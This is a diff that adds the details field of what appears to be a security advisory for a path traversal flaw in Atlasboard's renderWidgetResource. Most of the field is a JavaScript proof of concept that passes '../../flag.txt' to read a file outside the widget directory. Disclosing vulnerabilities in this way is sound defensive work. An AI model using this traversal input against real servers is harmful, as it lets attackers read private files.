+ "details": "The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.\n\n### PoC\n```javascript\nconst widget = require(\"atlasboard/lib/webapp/routes/widget\");\n\n// Mock req and res\nconst req = {};\nconst res = {\n sendFile: (filePath) => {\n // Read and return file contents synchronously\n const data = fs.readFileSync(filePath, \"utf8\");\n console.log(\"Contents of /flag.txt:\");\n console.log(data);\n },\n status: function (code) {\n this.statusCode = code;\n return this;\n },\n send: function (msg) {\n throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);\n },\n};\n\n// localPackagesPath set to root to allow traversal to /flag.txt\nconst localPackagesPath = \"/\";\n\n// resource string with path traversal to escape localPackagesPath and widgets directory\nconst resource = \"../../flag.txt\";\n\n// Call vulnerable function\nawait widget.renderWidgetResource(localPackagesPath, resource, req, res);\n```",